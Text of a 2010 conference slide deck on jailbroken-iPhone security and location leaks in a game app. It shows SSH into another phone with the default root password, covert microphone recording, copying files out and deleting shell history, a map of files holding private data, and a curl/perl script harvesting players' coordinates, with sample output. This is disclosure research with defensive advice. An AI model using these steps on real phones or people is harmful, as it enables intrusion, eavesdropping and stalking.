the new world of smartphone security

The New World of Smartphone Security

What Your iPhone Disclosed About You

Trevor HawthornManaging Partner

Friday, July 9, 2010

Today’s Talk

“Pockets full of shells”

Friday, July 9, 2010

Today’s Talk

“I can see you from my house”

Friday, July 9, 2010

Who I am now

Friday, July 9, 2010

Old Smartphone Best Practices

= Bad

= Good

Friday, July 9, 2010

New Smartphone Best Practices

1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.

2. Get iFart, it’s hilarious.

Friday, July 9, 2010

If AT&T is in attendance:

Friday, July 9, 2010

If AT&T is in attendance:

• Facts about AT&T and me:

Friday, July 9, 2010

If AT&T is in attendance:

• Facts about AT&T and me:

• I enjoy my AT&T wireless service

Friday, July 9, 2010

If AT&T is in attendance:

• Facts about AT&T and me:

• I enjoy my AT&T wireless service

• Feel that I have fantastic coverage everywhere I go at all times

Friday, July 9, 2010

If AT&T is in attendance:

• Facts about AT&T and me:

• I enjoy my AT&T wireless service

• Feel that I have fantastic coverage everywhere I go at all times

• Am sure you have the largest/fastest 3G network, regardless of what VZW says

Friday, July 9, 2010

If AT&T is in attendance:

• Facts about AT&T and me:

• I enjoy my AT&T wireless service

• Feel that I have fantastic coverage everywhere I go at all times

• Am sure you have the largest/fastest 3G network, regardless of what VZW says

• Looking forward to years of receiving quality service from you

Friday, July 9, 2010

If AT&T is in attendance:

• Facts about AT&T and me:

• I enjoy my AT&T wireless service

• Feel that I have fantastic coverage everywhere I go at all times

• Am sure you have the largest/fastest 3G network, regardless of what VZW says

• Looking forward to years of receiving quality service from you

• Would love to chat

Friday, July 9, 2010

Jailbreaking

blackra1n

pwnagetool

Friday, July 9, 2010

It opens up a whole new world of applications

Friday, July 9, 2010

It opens up a whole new world of applications

• common Unix binaries

Friday, July 9, 2010

It opens up a whole new world of applications

• common Unix binaries

• sshd

Friday, July 9, 2010

It opens up a whole new world of applications

• common Unix binaries

• sshd

• tethering

Friday, July 9, 2010

It opens up a whole new world of applications

• common Unix binaries

• sshd

• tethering

• pirate software

Friday, July 9, 2010

It opens up a whole new world of applications

• common Unix binaries

• sshd

• tethering

• pirate software

• super easy to JB your phone

Friday, July 9, 2010

Impact on security

“Jail breaking removes 80% of the iPhone’s security precautions”

Charlie Miller, SyScan 2009

Friday, July 9, 2010

How many iPhones are jailbroken?

Friday, July 9, 2010

6.93%

[1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore

Friday, July 9, 2010

Global Stats

Friday, July 9, 2010

ifconfig root# ifconfig

lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384

inet 127.0.0.1 netmask 0xff000000

en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500

ether 00:21:e9:09:e3:4f

pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff

pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024

pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024

en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500

inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255

ether 0a:0b:ad:0b:ab:e0

Friday, July 9, 2010

Interfaces

Friday, July 9, 2010

en0 = 802.11 interface

Interfaces

Friday, July 9, 2010

en0 = 802.11 interface

pdp_ip0 = primary cellular interface on APN: wap.cingular

Interfaces

Friday, July 9, 2010

en0 = 802.11 interface

pdp_ip0 = primary cellular interface on APN: wap.cingular

pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail

Interfaces

Friday, July 9, 2010

en0 = 802.11 interface

pdp_ip0 = primary cellular interface on APN: wap.cingular

pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail

pdp_ip2 = not sure

Interfaces

Friday, July 9, 2010

en0 = 802.11 interface

pdp_ip0 = primary cellular interface on APN: wap.cingular

pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail

pdp_ip2 = not sure

pdp_ip3 = used with tethering

Interfaces

Friday, July 9, 2010

ifconfig

pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff

Friday, July 9, 2010

sshd

Friday, July 9, 2010

So what?

Friday, July 9, 2010

Until (about) October 16, 2009 AT&T did not filter device to device IP network

traffic.

Friday, July 9, 2010

AT&T’s Network

Most people think it looks like this:

/32

Friday, July 9, 2010

AT&T’s Network

Actually, more like this:

Multiple /16’s

Friday, July 9, 2010

Your smartphone (and laptop/blackberry, etc.) has been on one giant

flat network...

Friday, July 9, 2010

So I started looking around...

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Devices On the Network

10,589* IPs scanned

Count Port What?

83244

3,644

22 sshd80 http

2008 PDANet62078 iPhone Default

Friday, July 9, 2010

Other stuff out there

• Saw a Linux box with sshd

• Windows Mobile devices

• Blackberries

• Windows PC’s

• PDANet for the iPhone is an open proxy.

Friday, July 9, 2010

Friday, July 9, 2010

ssh access between phones

Trevors-iPhone:~ root# ssh root@10.69.62.100

Password: [alpine]

Nates-iPhone:~ root#

Nates-iPhone:~ root# id

uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)

Friday, July 9, 2010

Filesystem Guide

Interesting stuff:

/private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)/private/var/mobile/Library/SMS - SMS Text Messages/private/var/mobile/Library/Voicemail - Voicemail in .amr format/private/var/mobile/Library/AddressBook - Contacts/private/var/mobile/Library/CallHistory - Call History/private/var/mobile/Library/Notes - Notes

Friday, July 9, 2010

/private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr files) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db

Friday, July 9, 2010

Let’s do a bit more

Erica Utilities - cmd line utilities for the iPhone

recAudiorecAudio: Record audio from the onboard microphone.

findmeQueries the iPhone’s GPS API to return latitude/longitude

Friday, July 9, 2010

Attacker Victim

recAudio

scp/ssh

recording.aiff

10.69.62.10010.69.62.220

Friday, July 9, 2010

I can hear you typingTrevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:

Password:

recAudio 100% 19KB 1.3KB/s 00:00

Trevors-iPhone:~ root# ssh root@10.69.62.100

Password:

Nates-iPhone:~ root# ./recAudio

Start talking. Press ^C to finish.

Starting recording

^C

Interrupted.

Stopping recording

Friday, July 9, 2010

Nates-iPhone:~ root# ls -l *.aiff

-rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92\ at\ 22:35:04.aiff

Nates-iPhone:~ root# mv 2009-10-92\ at\ 22:35:04.aiff test.aiff

Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff .

Password:

test.aiff 100% 523KB 2.2KB/s 00:00

Nates-iPhone:~ root# rm test.aiff recAudio .bash_history

Nates-iPhone:~ root# last

wtmp begins at Fri Oct 2 22:41

Nates-iPhone:~ root#

Friday, July 9, 2010

Other bad things

Friday, July 9, 2010

Other bad things

• ./openURL tel://1-900-XXX-XXX

Friday, July 9, 2010

Other bad things

• ./openURL tel://1-900-XXX-XXX

• ./openURL tel://911 or tel://mynumber

Friday, July 9, 2010

Other bad things

• ./openURL tel://1-900-XXX-XXX

• ./openURL tel://911 or tel://mynumber

• Pillage filesystem: email, sms, notes, app data, etc.

Friday, July 9, 2010

Other bad things

• ./openURL tel://1-900-XXX-XXX

• ./openURL tel://911 or tel://mynumber

• Pillage filesystem: email, sms, notes, app data, etc.

• apt-get install tcpdump nmap

Friday, July 9, 2010

Other bad things

• ./openURL tel://1-900-XXX-XXX

• ./openURL tel://911 or tel://mynumber

• Pillage filesystem: email, sms, notes, app data, etc.

• apt-get install tcpdump nmap

• go wild on whatever network en0 is connected to.

Friday, July 9, 2010

Worms and Exploits

Friday, July 9, 2010

Dutch Extortion

November 2009

Friday, July 9, 2010

ikee Worm

November 2009

Friday, July 9, 2010

Exploits

• Phone/Privacy.A* command line tool

• Phone/iBotNet.A* worm with C&C*Discovered by security firm Intego

Friday, July 9, 2010

Some good news

Friday, July 9, 2010

Some good news• AT&T does segment part of their network:

Friday, July 9, 2010

Some good news• AT&T does segment part of their network:

• e.g. I could not see friend in CA from DC

Friday, July 9, 2010

Some good news• AT&T does segment part of their network:

• e.g. I could not see friend in CA from DC

• But I could see friend in Boston

Friday, July 9, 2010

Some good news• AT&T does segment part of their network:

• e.g. I could not see friend in CA from DC

• But I could see friend in Boston

• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)

Friday, July 9, 2010

Some good news• AT&T does segment part of their network:

• e.g. I could not see friend in CA from DC

• But I could see friend in Boston

• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)

• No way to correlate 10.x.x.x IP to person via Safari

Friday, July 9, 2010

Some good news• AT&T does segment part of their network:

• e.g. I could not see friend in CA from DC

• But I could see friend in Boston

• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)

• No way to correlate 10.x.x.x IP to person via Safari

• decloak.net doesn’t really work in Mobile Safari

Friday, July 9, 2010

Some good news• AT&T does segment part of their network:

• e.g. I could not see friend in CA from DC

• But I could see friend in Boston

• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)

• No way to correlate 10.x.x.x IP to person via Safari

• decloak.net doesn’t really work in Mobile Safari

• Man this is slow...

Friday, July 9, 2010

email to ID user

<img src=”http://10.69.62.220/i.jpg”>

10.69.63.220:80 10.69.63.110

10.69.63.220:80 10.69.63.110src:10.69.63.110dst:10.69.63.220

Friday, July 9, 2010

What to do

• Don’t Jailbreak your phone if you care about security (sorry)

• Change root and mobile users’ passwords

• Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install

• IT Folks: Policy on jailbroken iphones

• AT&T: Filter mobile to mobile IP traffic

Friday, July 9, 2010

Privacy and Location Based Apps

Friday, July 9, 2010

Location Based Apps

Friday, July 9, 2010

Location Based Apps

• Underworld: Sweet Deal

Friday, July 9, 2010

Location Based Apps

• Underworld: Sweet Deal

• Drug trafficking game with candy

Friday, July 9, 2010

Location Based Apps

• Underworld: Sweet Deal

• Drug trafficking game with candy

• Location matters, move product from point A to point B

Friday, July 9, 2010

Location Based Apps

• Underworld: Sweet Deal

• Drug trafficking game with candy

• Location matters, move product from point A to point B

• Phone sends high resolution coordinates to game server

Friday, July 9, 2010

Like Druglords

Friday, July 9, 2010

Underworld: Sweetdeal

Friday, July 9, 2010

Google Maps

Friday, July 9, 2010

Paros

• Client side proxy

• Configure iPhone to use machine running Paros’s IP address as proxy

• Watch what your apps send and receive

Friday, July 9, 2010

Request

Friday, July 9, 2010

Response

Friday, July 9, 2010

Used to monitor players

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Let’s pick a non-intel agency player

chezk

Friday, July 9, 2010

Request

Friday, July 9, 2010

Response

Friday, July 9, 2010

Lat/Lon to GMaps:

Friday, July 9, 2010

County Records

Friday, July 9, 2010

Facebook

Friday, July 9, 2010

Ok neat, what else?

Friday, July 9, 2010

Near real-time geolocation tracking of players

Friday, July 9, 2010

cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots

Friday, July 9, 2010

#/bin/sh## First login...#curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/## Then update locationcurl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/update_loc.xml http://game.dl.a-steroids.com/TrafficServer/## Get GMap obhjectscurl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/

curl script

Friday, July 9, 2010

perl script#! /usr/bin/perl

use strict;use warnings;

# make single or multiline input into one scalar my $glob = join('',(<>));

# extract name-to-flag records my @records = $glob =~ /(<name>.*?<\/lon>)/ig;

for (@records){ my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([\-\d\.]*)</lat><lon>([\-\d\.]*)</lon>|i; print "$lat,$lon,$name\n";}

Friday, July 9, 2010

perl script output

39.93220206723633,-77.47186584472656,poppyseed38.13753356933594,-77.06847380591797,Gadsden39.98429718017578,-78.30014190673828,Ziggety39.23520812988281,-77.40483581542969,Lexi39.855418395996094,-77.2717056274414,Tatu39.55705801582031,-77.4004086303711,Bigfoot36.67790985107422,-77.5902328491211,Jeneko38.297552490234375,-77.65829467773438,Stilbored39.891050720214844,-77.55879211025781,Timoteo39.66313247680664,-78.04374694824219,Gamber36.295310314697266,-78.14061126700984,UnderWear

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Friday, July 9, 2010

Comments/Feedback:

trevor.hawthorn@stratumsecurity.com

www.stratumsecurity.com

Twitter:

@packetwerks

@stratumsecurity

Special Thanks: Tiago Stock

Friday, July 9, 2010